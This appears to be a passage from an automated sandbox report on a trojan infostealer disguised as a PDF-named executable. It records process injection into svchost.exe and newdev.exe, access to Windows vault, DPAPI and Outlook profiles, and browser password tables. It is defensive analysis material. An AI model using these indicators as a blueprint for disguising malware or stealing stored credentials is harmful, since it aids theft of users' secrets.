              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B668683_2_04B66868
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C208353_2_04C20835
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B7E9A03_2_04B7E9A0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C3E9A63_2_04C3E9A6
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C3EA5B3_2_04C3EA5B
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C3CA133_2_04C3CA13
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BF4BC03_2_04BF4BC0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B80B103_2_04B80B10
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BED4803_2_04BED480
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C375C63_2_04C375C6
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C3F5C93_2_04C3F5C9
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C3F6F63_2_04C3F6F6
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BF36EC3_2_04BF36EC
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B416CC3_2_04B416CC
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C2D6463_2_04C2D646
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C1D62C3_2_04C1D62C
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C370F13_2_04C370F1
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BB508C3_2_04BB508C
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B8B0D03_2_04B8B0D0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B9B1E03_2_04B9B1E0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B851C03_2_04B851C0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B6F1133_2_04B6F113
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BC717A3_2_04BC717A
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C1D1303_2_04C1D130
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B6D2EC3_2_04B6D2EC
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C3124C3_2_04C3124C
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B713803_2_04B71380
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C3F3303_2_04C3F330
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C07CE83_2_04C07CE8
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B9FCE03_2_04B9FCE0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C19C983_2_04C19C98
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B83C603_2_04B83C60
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C1FDF43_2_04C1FDF4
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B89DD03_2_04B89DD0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C37D4C3_2_04C37D4C
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C3FD273_2_04C3FD27
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B81EB23_2_04B81EB2
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C39ED23_2_04C39ED2
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C31FC63_2_04C31FC6
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C3FF633_2_04C3FF63
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BFFF403_2_04BFFF40
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BF98B23_2_04BF98B2
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C318DA3_2_04C318DA
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C378F33_2_04C378F3
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C3F8723_2_04C3F872
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B838003_2_04B83800
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B898703_2_04B89870
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B9B8703_2_04B9B870
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BF58703_2_04BF5870
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B499E83_2_04B499E8
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BC59C03_2_04BC59C0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04B9FAA03_2_04B9FAA0
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C3FA893_2_04C3FA89
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04BBDB193_2_04BBDB19
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_04C3FB2E3_2_04C3FB2E
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_0493EF683_2_0493EF68
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_0493E6A93_2_0493E6A9
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_0493E2883_2_0493E288
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_049452EC3_2_049452EC
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_0493E3A43_2_0493E3A4
              Source: C:\Windows\SysWOW64\newdev.exeCode function: 3_2_0493D8083_2_0493D808
              Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C75050 appears 36 times
              Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CBEF10 appears 105 times
              Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C2B910 appears 272 times
              Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CAE692 appears 86 times
              Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C87BE4 appears 98 times
              Source: C:\Windows\SysWOW64\newdev.exeCode function: String function: 04BC7BE4 appears 98 times
              Source: C:\Windows\SysWOW64\newdev.exeCode function: String function: 04BEE692 appears 86 times
              Source: C:\Windows\SysWOW64\newdev.exeCode function: String function: 04BFEF10 appears 105 times
              Source: C:\Windows\SysWOW64\newdev.exeCode function: String function: 04BB5050 appears 36 times
              Source: C:\Windows\SysWOW64\newdev.exeCode function: String function: 04B6B910 appears 272 times
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: String function: 00366AC0 appears 42 times
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: String function: 0036F8A0 appears 35 times
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: String function: 0035EC2F appears 68 times
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, 00000000.00000003.6124352718.0000000003FFD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, 00000000.00000003.6122007860.0000000003E53000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@1/1
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0038CE7A GetLastError,FormatMessageW,0_2_0038CE7A
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0037AB84 AdjustTokenPrivileges,CloseHandle,0_2_0037AB84
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0037B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_0037B134
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0038E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0038E1FD
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00386532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00386532
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0039C18C CoInitializeSecurity,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0039C18C
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0034406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_0034406B
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeFile created: C:\Users\user\AppData\Local\Temp\autBB75.tmpJump to behavior
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: newdev.exe, 00000003.00000002.6806932663.0000000007E93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
              Source: newdev.exe, 00000003.00000003.6743657382.0000000000B87000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000002.6803895083.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6743835728.0000000000BA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: newdev.exe, 00000003.00000003.6752649694.0000000007EE7000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000002.6806932663.0000000007EF2000.00000004.00000020.00020000.00000000.sdmp, E8-03HaL.3.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeReversingLabs: Detection: 47%
              Source: unknownProcess created: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe "C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe"
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe"
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\newdev.exe "C:\Windows\SysWOW64\newdev.exe"
              Source: C:\Windows\SysWOW64\newdev.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe"Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\newdev.exe "C:\Windows\SysWOW64\newdev.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: winsqlite3.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeStatic file information: File size 1187840 > 1048576
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: wntdll.pdbUGP source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, 00000000.00000003.6124352718.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, 00000000.00000003.6122007860.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.6566665422.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6481941965.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6484713548.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.6566665422.0000000003D2D000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000003.00000002.6805398379.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6565523666.00000000047EB000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000002.6805398379.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6570069236.0000000004993000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, 00000000.00000003.6124352718.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, 00000000.00000003.6122007860.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.6566665422.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6481941965.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6484713548.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.6566665422.0000000003D2D000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, newdev.exe, 00000003.00000002.6805398379.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6565523666.00000000047EB000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000002.6805398379.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6570069236.0000000004993000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: NewDev.pdbGCTL source: svchost.exe, 00000001.00000003.6534482142.000000000362A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6534458151.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6534284497.000000000361B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: NewDev.pdb source: svchost.exe, 00000001.00000003.6534482142.000000000362A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6534458151.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6534284497.000000000361B000.00000004.00000020.00020000.00000000.sdmp
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0035E01E LoadLibraryA,GetProcAddress,0_2_0035E01E
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00366B05 push ecx; ret 0_2_00366B18
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00349C63 push edi; retn 0000h0_2_00349C65
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00349DD8 push F7FFFFFFh; retn 0000h0_2_00349DDD
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D03B push es; iretd 1_2_0040D0A5
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004070B1 push 64620B57h; iretd 1_2_004070E8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403170 push eax; ret 1_2_00403172
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D2EE pushfd ; retf 1_2_0040D336
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041EC00 pushad ; retf 1_2_0041EC7F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D5CE push ss; ret 1_2_0040D5D4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A6D3 push FFFFFFFEh; ret 1_2_0041A68F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A754 push edi; iretd 1_2_0041A78C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A77F push edi; iretd 1_2_0041A78C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004137D3 pushfd ; ret 1_2_004137F4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418FE9 push ds; ret 1_2_00418FF0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A783 push edi; iretd 1_2_0041A78C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C021AD pushad ; retf 0004h1_2_03C0223F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C308CD push ecx; mov dword ptr [esp], ecx1_2_03C308D6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C01097 push esi; ret 1_2_03C010A2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C097A1 push es; iretd 1_2_03C097A8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_04D1744C push ss; iretd 1_2_04D1746A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_04D2455E push ebp; ret 1_2_04D24563
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_04D14541 push edx; ret 1_2_04D14568
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_04D146C8 push ss; ret 1_2_04D146D7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_04D14690 pushad ; retf 1_2_04D146A7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_04D1C7EE push FFFFFF97h; iretd 1_2_04D1C80D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_04D157AE push esp; retf 1_2_04D157B9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_04D25122 push eax; ret 1_2_04D25124
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_04D15F77 push es; iretd 1_2_04D15F78
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_04D15F26 push ss; retf 1_2_04D15F32
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_032ABF26 push ss; retf 2_2_032ABF32
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_032ABF77 push es; iretd 2_2_032ABF78
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeFile created: \heng hui 68 full specification details and pic pdf.exe
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeFile created: \heng hui 68 full specification details and pic pdf.exeJump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_003A8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_003A8111
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0035EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0035EB42
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0036123A GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0036123A
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
